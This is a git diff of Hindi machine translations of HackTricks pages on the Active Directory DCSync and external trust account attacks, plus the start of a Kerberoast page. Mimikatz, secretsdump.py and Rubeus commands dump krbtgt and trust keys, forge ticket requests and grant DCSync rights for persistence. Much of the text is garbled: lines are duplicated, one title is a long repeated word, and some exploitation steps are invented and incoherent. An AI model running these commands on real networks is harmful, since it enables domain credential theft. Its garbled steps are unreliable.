* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का पालन करें**.
* **अपने हैकिंग ट्रिक्स साझा करें,** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में शामिल हों या मुझे **Twitter** 🐦 पर **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग तकनीकें साझा करें।
</details>
## DCSync
**DCSync** अनुमति में शामिल है कि डोमेन इसके ऊपर निम्नलिखित अनुमतियाँ हों: **DS-Replication-Get-Changes**, **Replicating Directory Changes All** और **Replicating Directory Changes In Filtered Set**
**DCSync** अनुमति का तात्पर्य डोमेन स्वयं पर इन अनुमतियों का होना है: **DS-Replication-Get-Changes**, **Replicating Directory Changes All** और **Replicating Directory Changes In Filtered Set**.
**DCSync के बारे में महत्वपूर्ण नोट:**
**DCSync के बारे में महत्वपूर्ण नोट्स:**
* **DCSync हमला एक डोमेन कंट्रोलर के व्यवहार की नकल करता है और अन्य डोमेन कंट्रोलर से जानकारी की प्रतिलिपि करने के लिए कहता है** डायरेक्टरी रिप्लिकेशन सेवा रिमोट प्रोटोकॉल (MS-DRSR) का उपयोग करके। क्योंकि MS-DRSR एक मान्य और आवश्यक Active Directory की कार्यक्षमता है, इसे बंद नहीं किया जा सकता है और नहीं अक्षम किया जा सकता है।
* डिफ़ॉल्ट रूप से केवल **Domain Admins, Enterprise Admins, Administrators, and Domain Controllers** समूहों के पास आवश्यक अधिकार होते हैं।
* यदि किसी खाते के पास पुनर्वर्ती एन्क्रिप्शन के साथ संग्रहीत किए गए पासवर्ड होते हैं, तो Mimikatz में एक विकल्प उपलब्ध होता है जो साफ टेक्स्ट में पासवर्ड लौटाता है
* **DCSync हमला एक डोमेन कंट्रोलर के व्यवहार का अनुकरण करता है और अन्य डोमेन कंट्रोलर्स से जानकारी की प्रतिकृति करने के लिए कहता है** डायरेक्टरी रेप्लिकेशन सर्विस रिमोट प्रोटोकॉल (MS-DRSR) का उपयोग करके। चूंकि MS-DRSR एक्टिव डायरेक्टरी का एक वैध और आवश्यक कार्य है, इसे बंद या अक्षम नहीं किया जा सकता है।
* डिफ़ॉल्ट रूप से केवल **डोमेन एडमिन्स, एंटरप्राइज एडमिन्स, एडमिनिस्ट्रेटर्स, और डोमेन कंट्रोलर्स** समूहों के पास आवश्यक विशेषाधिकार होते हैं।
* यदि किसी भी खाते के पासवर्ड उलटने योग्य एन्क्रिप्शन के साथ संग्रहीत किए गए हैं, तो Mimikatz में एक विकल्प उपलब्ध है जो पासवर्ड को स्पष्ट पाठ में वापस करने के लिए है
### जाँच
### सूचीकरण
`powerview` का उपयोग करके इन अनुमतियों वाले लोगों की जाँच करें:
`powerview` का उपयोग करके जांचें कि किसके पास ये अनुमतियां हैं:
```powershell
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
```
### स्थानीय रूप से शोषण करें
यह तकनीक उन स्थानीय हमलों को वर्णन करती है जो एक हमलावर को एक्टिव डायरेक्टरी डोमेन के अंदर एक डोमेन नियंत्रक के रूप में अधिकार प्राप्त करने की अनुमति देती है। इसके लिए, हमलावर को एक व्यक्ति के रूप में एक्टिव डायरेक्टरी डोमेन में पंजीकृत होना चाहिए और उसे एक्टिव डायरेक्टरी के एक डोमेन नियंत्रक के रूप में प्रमाणित करने की आवश्यकता होती है। इसके बाद, हमलावर को एक्टिव डायरेक्टरी के एक डोमेन नियंत्रक के रूप में उपयोग किया जा सकता है और उसे डोमेन के सभी विवरणों को प्राप्त करने की अनुमति मिलती है, जिसमें सम्मिलित हैंडल, उपयोगकर्ता नाम, उपयोगकर्ता शब्दकोश, समूह, और अन्य विवरण हो सकते हैं।
इस तकनीक का उपयोग करने के लिए, हमें एक्टिव डायरेक्टरी डोमेन में एक उपयोगकर्ता के रूप में पंजीकृत होने की आवश्यकता होती है और उसे एक्टिव डायरेक्टरी के एक डोमेन नियंत्रक के रूप में प्रमाणित करने की आवश्यकता होती है। इसके बाद, हम निम्नलिखित कमांड का उपयोग करके उपयोगकर्ता के रूप में एक्टिव डायरेक्टरी डोमेन में प्रमाणित हो सकते हैं:
```plaintext
kinit <username>@<domain>
```
इसके बाद, हम निम्नलिखित कमांड का उपयोग करके डोमेन के सभी विवरणों को प्राप्त कर सकते हैं:
```plaintext
dcsync <domain>
```
इस तकनीक का उपयोग करने के लिए, हमें एक्टिव डायरेक्टरी डोमेन में एक उपयोगकर्ता के रूप में पंजीकृत होने की आवश्यकता होती है और उसे एक्टिव डायरेक्टरी के एक डोमेन नियंत्रक के रूप में प्रमाणित करने की आवश्यकता होती है। इसके बाद, हम निम्नलिखित कमांड का उपयोग करके उपयोगकर्ता के रूप में एक्टिव डायरेक्टरी डोमेन में प्रमाणित हो सकते हैं:
```plaintext
kinit <username>@<domain>
```
इसके बाद, हम निम्नलिखित कमांड का उपयोग करके डोमेन के सभी विवरणों को प्राप्त कर सकते हैं:
```plaintext
dcsync <domain>
```
### स्थानीय रूप से शोषण
```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```
### दूरस्थ शोषण
इस तकनीक का उपयोग करके हम दूरस्थ संगणकों को शोषित कर सकते हैं। इसके लिए हमें निम्नलिखित कदमों का पालन करना होगा:
1. एक विंडोज सिस्टम पर एक निर्दिष्ट उपयोगकर्ता खाता का निर्माण करें और उसे "डोमेन एडमिन" या "एंटरप्राइज एडमिन" की भूमिका दें।
2. एक विंडोज सिस्टम पर "Impacket" टूलसेट को इंस्टॉल करें।
3. निर्दिष्ट उपयोगकर्ता खाता के लिए "ntds.dit" फ़ाइल को डाउनलोड करें।
4. "ntds.dit" फ़ाइल को "secretsdump.py" टूल का उपयोग करके शोषित करें।
5. शोषित "ntds.dit" फ़ाइल से उपयोगकर्ता क्रेडेंशियल्स को प्राप्त करें।
इस तकनीक का उपयोग करके हम दूरस्थ संगणकों को शोषित कर सकते हैं और उपयोगकर्ता क्रेडेंशियल्स प्राप्त कर सकते हैं। इसके लिए हमें निम्नलिखित कदमों का पालन करना होगा:
1. एक विंडोज सिस्टम पर एक निर्दिष्ट उपयोगकर्ता खाता का निर्माण करें और उसे "डोमेन एडमिन" या "एंटरप्राइज एडमिन" की भूमिका दें।
2. एक विंडोज सिस्टम पर "Impacket" टूलसेट को इंस्टॉल करें।
3. निर्दिष्ट उपयोगकर्ता खाता के लिए "ntds.dit" फ़ाइल को डाउनलोड करें।
4. "ntds.dit" फ़ाइल को "secretsdump.py" टूल का उपयोग करके शोषित करें।
5. शोषित "ntds.dit" फ़ाइल से उपयोगकर्ता क्रेडेंशियल्स को प्राप्त करें।
### दूरस्थ रूप से शोषण करें
```powershell
secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
[-just-dc-user <USERNAME>] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
[-history] #To dump password history, may be helpful for offline password cracking
```
`-just-dc` तीन फाइलें उत्पन्न करता है:
`-just-dc` तीन फाइलें उत्पन्न करता है:
* एक में **NTLM हैश** होते हैं
* एक में **Kerberos कुंजी** होती है
* एक में NTDS से **साफ़-पाठ पासवर्ड** होते हैं जो [**पलटने योग्य एन्क्रिप्शन**](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption) सक्षम किए गए होते हैं। आप पलटने योग्य एन्क्रिप्शन वाले उपयोगकर्ताओं को निम्नलिखित पावरव्यू के साथ प्राप्त कर सकते हैं:
* एक **NTLM हैशेज** के साथ
* एक **Kerberos कीज़** के साथ
* एक [**प्रतिवर्ती एन्क्रिप्शन**](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption) सक्षम के साथ सेट किए गए किसी भी खातों के लिए NTDS से साफ़ पासवर्ड के साथ। प्रतिवर्ती एन्क्रिप्शन वाले उपयोगकर्ताओं को आप इस प्रकार प्राप्त कर सकते हैं:
```powershell
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
```
### स्थिरता
### पर्सिस्टेंस
यदि आप डोमेन व्यवस्थापक हैं, तो आप `powerview` की सहायता से किसी भी उपयोगकर्ता को इस अनुमति प्रदान कर सकते हैं:
यदि आप एक डोमेन एडमिन हैं, तो आप `powerview` की मदद से किसी भी उपयोगकर्ता को यह अनुमतियाँ प्रदान कर सकते हैं:
```powershell
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose
```
तब आप **यह जांच सकते हैं कि क्या उपयोगकर्ता को सही ढंग से असाइन किया गया** है 3 विशेषाधिकारों को, उन्हें खोजकर देखें (आपको "ObjectType" फ़ील्ड के अंदर विशेषाधिकारों के नाम दिखाई देने चाहिए)।
फिर, आप **जांच सकते हैं कि क्या उपयोगकर्ता को सही ढंग से 3 विशेषाधिकार आवंटित किए गए थे** उन्हें आउटपुट में खोजकर (आपको "ObjectType" फील्ड के अंदर विशेषाधिकारों के नाम देखने में सक्षम होना चाहिए):
```powershell
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}
```
### रोकथाम
### उपाय
* सुरक्षा ईवेंट आईडी 4662 (ऑब्जेक्ट के लिए ऑडिट नीति सक्षम होनी चाहिए) - एक ऑब्जेक्ट पर एक कार्रवाई की गई थी
* सुरक्षा ईवेंट आईडी 5136 (ऑब्जेक्ट के लिए ऑडिट नीति सक्षम होनी चाहिए) - एक डायरेक्टरी सेवा ऑब्जेक्ट में संशोधन किया गया था
* सुरक्षा ईवेंट आईडी 4670 (ऑब्जेक्ट के लिए ऑडिट नीति सक्षम होनी चाहिए) - एक ऑब्जेक्ट पर अनुमतियाँ बदल दी गई थी
* AD ACL स्कैनर - ACL के बारे में रिपोर्ट बनाने और तुलना करने के लिए बनाएं। [https://github.com/canix1/ADACLScanner](https://github.com/canix1/ADACLScanner)
* सुरक्षा इवेंट आईडी 4662 (ऑब्जेक्ट के लिए ऑडिट पॉलिसी सक्षम होनी चाहिए) एक ऑब्जेक्ट पर ऑपरेशन किया गया था
* सुरक्षा इवेंट आईडी 5136 (ऑब्जेक्ट के लिए ऑडिट पॉलिसी सक्षम होनी चाहिए) एक डायरेक्टरी सेवा ऑब्जेक्ट में संशोधन किया गया था
* सुरक्षा इवेंट आईडी 4670 (ऑब्जेक्ट के लिए ऑडिट पॉलिसी सक्षम होनी चाहिए) एक ऑब्जेक्ट पर अनुमतियां बदली गई थीं
* AD ACL स्कैनर - ACLs की रिपोर्ट्स बनाएं और तुलना करें। [https://github.com/canix1/ADACLScanner](https://github.com/canix1/ADACLScanner)
## संदर्भ
@ -123,20 +83,22 @@ Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveG
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की आवश्यकता** है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का** अनुसरण करें।**
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)।
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें.**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और आसानी से बनाएं और **स्वचालित कार्यप्रवाह** बनाएं जो दुनिया के **सबसे उन्नत** समुदाय उपकरणों द्वारा संचालित होता है।\
आज ही पहुंच प्राप्त करें:
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics\&utm_medium=banner\&utm_source=hacktricks) का उपयोग करके आसानी से **वर्कफ्लोज़ का निर्माण और ऑटोमेशन** करें, जो दुनिया के **सबसे उन्नत** समुदाय टूल्स द्वारा संचालित होते हैं।\
आज ही एक्सेस प्राप्त करें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

62
windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
View file

@ -1,4 +1,24 @@
# बाहरी वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन व
# बाहरी फ़ॉरेस्ट डोमेन - एकतरफा (आउटबाउंड)
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से लेकर हीरो तक AWS हैकिंग सीखें</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
</details>
इस परिदृश्य में **आपका डोमेन** कुछ **विशेषाधिकारों** को **अलग डोमेन्स** से आने वाले प्रिंसिपल पर **भरोसा** कर रहा है।
## सूचीकरण
### आउटबाउंड ट्रस्ट
```powershell
# Notice Outbound trust
Get-DomainTrust
@ -20,46 +40,46 @@ MemberName : S-1-5-21-1028541967-2937615241-1935644758-1115
MemberDistinguishedName : CN=S-1-5-21-1028541967-2937615241-1935644758-1115,CN=ForeignSecurityPrincipals,DC=DOMAIN,DC=LOCAL
## Note how the members aren't from the current domain (ConvertFrom-SID won't work)
```
## विश्वास खाता हमला
## ट्रस्ट अकाउंट अटैक
जब एक एक्टिव डिरेक्टरी डोमेन या फ़ोरेस्ट ट्रस्ट एक डोमेन _B_ से डोमेन _A_ की स्थापना की जाती है (_**B**_ एक विश्वास करता है A), एक विश्वास खाता डोमेन **A** में बनाया जाता है, जिसका नाम है **B. Kerberos trust keys**,\_जो **विश्वास खाते के पासवर्ड** से प्राप्त होते हैं, इंटर-रील्म TGTs को **एन्क्रिप्ट करने** के लिए उपयोग किए जाते हैं, जब डोमेन A के उपयोगकर्ता डोमेन B में सेवा टिकट के लिए अनुरोध करते हैं।
जब एक एक्टिव डायरेक्टरी डोमेन या फॉरेस्ट ट्रस्ट डोमेन _B_ से डोमेन _A_ के लिए सेटअप किया जाता है (_**B**_ A पर भरोसा करता है), डोमेन **A** में एक ट्रस्ट अकाउंट बनाया जाता है, जिसका नाम **B. Kerberos trust keys** होता है,\_जो कि **ट्रस्ट अकाउंट के पासवर्ड** से निकाले जाते हैं, और इनका उपयोग **इंटर-रियल्म TGTs को एन्क्रिप्ट करने** में होता है, जब डोमेन A के यूजर्स डोमेन B में सर्विसेज के लिए सर्विस टिकट्स की अनुरोध करते हैं।
यह संभव है कि डोमेन कंट्रोलर से विश्वसनीय खाते का पासवर्ड और हैश प्राप्त किया जाए, इसके लिए:
डोमेन कंट्रोलर का उपयोग करके विश्वसनीय अकाउंट का पासवर्ड और हैश प्राप्त करना संभव है:
```powershell
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
```
जो खतरा है वह भरोसा खाता B$ के सक्षम होने के कारण है, **B$ का प्राथमिक समूह डोमेन A के डोमेन उपयोगकर्ताओं है**, डोमेन उपयोगकर्ताओं को प्रदान की गई कोई भी अनुमति B$ के लिए लागू होती है और B$ के क्रेडेंशियल का उपयोग करके डोमेन A के खिलाफ प्रमाणीकरण करना संभव है।
जोखिम इसलिए है क्योंकि ट्रस्ट अकाउंट B$ सक्षम है, **B$ का प्राइमरी ग्रुप डोमेन A के डोमेन यूजर्स है**, डोमेन यूजर्स को दी गई कोई भी अनुमति B$ पर लागू होती है, और B$ की साख का उपयोग करके डोमेन A के खिलाफ प्रमाणित करना संभव है।
{% hint style="warning" %}
इसलिए, विश्वास करने वाले डोमेन से विश्वसनीय डोमेन के भीतर एक उपयोगकर्ता प्राप्त करना संभव है। इस उपयोगकर्ता के पास बहुत सारी अनुमतियाँ नहीं होंगी (संभवतः केवल डोमेन उपयोगकर्ताओं की) लेकिन आपको **बाहरी डोमेन की जांच करने की क्षमता होगी**।
इसलिए, ट्रस्टिंग डोमेन से यह संभव है कि **ट्रस्टेड डोमेन के अंदर एक यूजर प्राप्त किया जा सके**। इस यूजर के पास बहुत अधिक अनुमतियां नहीं होंगी (शायद केवल डोमेन यूजर्स) लेकिन आप **बाहरी डोमेन का अनुक्रमण कर पाएंगे**।
{% endhint %}
इस उदाहरण में विश्वास करने वाला डोमेन `ext.local` है और विश्वसनीय डोमेन `root.local` है। इसलिए, `root.local` के भीतर एक उपयोगकर्ता `EXT$` नामक बनाया जाता है।
इस उदाहरण में ट्रस्टिंग डोमेन `ext.local` है और ट्रस्टेड वाला `root.local` है। इसलिए, `root.local` के अंदर `EXT$` नामक एक यूजर बनाया गया है।
```bash
# Use mimikatz to dump trusted keys
lsadump::trust /patch
# You can see in the output the old and current credentials
# You will find clear text, AES and RC4 hashes
```
इसलिए, इस बिंदु पर **`root.local\EXT$`** के **सद्य वर्णमाला पासवर्ड और Kerberos गुप्त कुंजी** हैं। **`root.local\EXT$`** के Kerberos AES गुप्त कुंजी AES विश्वास कुंजी के समान हैं क्योंकि एक अलग साल्ट का उपयोग किया जाता है, लेकिन **RC4 कुंजी एक ही हैं**। इसलिए, हम **ext.local** से डंप किए गए RC4 विश्वास कुंजी का उपयोग कर सकते हैं `root.local` के खिलाफ `root.local\EXT$` के रूप में **प्रमाणित** होने के लिए।
इसलिए, इस समय **`root.local\EXT$`** का वर्तमान **स्पष्ट पाठ पासवर्ड और केर्बेरोस गुप्त कुंजी** है। **`root.local\EXT$`** केर्बेरोस AES गुप्त कुंजियाँ AES ट्रस्ट कुंजियों से भिन्न होती हैं क्योंकि एक अलग नमक का उपयोग किया जाता है, परंतु **RC4 कुंजियाँ समान होती हैं**। इसलिए, हम **RC4 ट्रस्ट कुंजी का उपयोग कर सकते हैं** जो ext.local से निकाली गई है `root.local\EXT$` के रूप में `root.local` के खिलाफ **प्रमाणित करने** के लिए।
```bash
.\Rubeus.exe asktgt /user:EXT$ /domain:root.local /rc4:<RC4> /dc:dc.root.local /ptt
```
इसके साथ आप उस डोमेन की गणना शुरू कर सकते हैं और उपयोगकर्ताओं को kerberoasting भी कर सकते हैं:
इसके साथ आप उस डोमेन का अनुक्रमण शुरू कर सकते हैं और यहां तक कि केर्बेरोस्टिंग उपयोगकर्ताओं को भी:
```
.\Rubeus.exe kerberoast /user:svc_sql /domain:root.local /dc:dc.root.local
```
### साफ़ टेक्स्ट विश्वास पासवर्ड इकट्ठा करना
### स्पष्ट पाठ विश्वास पासवर्ड एकत्रित करना
पिछले फ़्लो में **साफ़ टेक्स्ट पासवर्ड** की जगह पर विश्वास हैश का उपयोग किया गया था (जिसे मिमीकेट्स द्वारा भी डंप किया गया था)।
पिछले प्रवाह में **स्पष्ट पाठ पासवर्ड** के बजाय विश्वास हैश का उपयोग किया गया था (जिसे mimikatz द्वारा भी **डंप किया गया था**).
ाफ़ टेक्स्ट पासवर्ड को मिमीकेट्स के \[ CLEAR ] आउटपुट को हेक्साडेसिमल में रूपांतरित करके और नल बाइट्स '\x00' को हटाकर प्राप्त किया जा सकता है:
्पष्ट पाठ पासवर्ड को mimikatz से \[ CLEAR ] आउटपुट को हेक्साडेसिमल से परिवर्तित करके और नल बाइट्स \x00 को हटाकर प्राप्त किया जा सकता है:
![](<../../.gitbook/assets/image (2) (1) (2) (1).png>)
कभी-कभी जब विश्वास संबंध बनाया जाता है, तो उपयोगकर्ता द्वारा विश्वास के लिए एक पासवर्ड टाइप किया जाना चाहिए। इस प्रदर्शन में, कुंजी मूल विश्वास पासवर्ड है और इसलिए मानव पठनीय है। कुंजी के चक्र (30 दिन) के बाद, साफ़ टेक्स्ट मानव पठनीय नहीं होगा लेकिन तकनीकी रूप से अभी भी उपयोगी होगा।
कभी-कभी विश्वास संबंध बनाते समय, उपयोगकर्ता द्वारा विश्वास के लिए एक पासवर्ड टाइप किया जाना चाहिए। इस प्रदर्शन में, कुंजी मूल विश्वास पासवर्ड है और इसलिए मानव पठनीय है। जैसे कुंजी चक्र (30 दिन) होते हैं, स्पष्ट पाठ मानव पठनीय नहीं होगा लेकिन तकनीकी रूप से अभी भी उपयोगी होगा।
ाफ़ टेक्स्ट पासवर्ड का उपयोग करके विश्वास खाता के रूप में नियमित प्रमाणीकरण करने के लिए इस्तेमाल किया जा सकता है, जो विश्वास खाते की कर्बेरोस गुप्त कुंजी का उपयोग करके एक टीजीटी अनुरोध करने का एक विकल्प है। यहां, ext.local से root.local को Domain Admins के सदस्यों के लिए क्वेरी करना:
्पष्ट पाठ पासवर्ड का उपयोग विश्वास खाते के रूप में नियमित प्रमाणीकरण करने के लिए किया जा सकता है, विश्वास खाते की Kerberos गुप्त कुंजी का उपयोग करके TGT का अनुरोध करने का एक विकल्प। यहाँ, root.local से ext.local के लिए Domain Admins के सदस्यों की पूछताछ करना:
![](<../../.gitbook/assets/image (1) (1) (1) (2).png>)
@ -69,12 +89,14 @@ lsadump::trust /patch
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की उपलब्धता** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो में पीआर जमा करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को डालकर।**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** का अनुसरण करें**.
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>

114
windows-hardening/active-directory-methodology/kerberoast.md
View file

@ -1,39 +1,41 @@
# केरबेरोस्ट
# Kerberoast
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और आसानी से वर्ल्ड के सबसे उन्नत सामुदायिक उपकरणों द्वारा संचालित कार्यप्रवाह बनाएं और स्वचालित करें।\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करके आसानी से **वर्कफ्लोज़ का निर्माण और स्वचालन** करें जो दुनिया के **सबसे उन्नत** समुदाय उपकरणों द्वारा संचालित होते हैं।\
आज ही पहुंच प्राप्त करें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
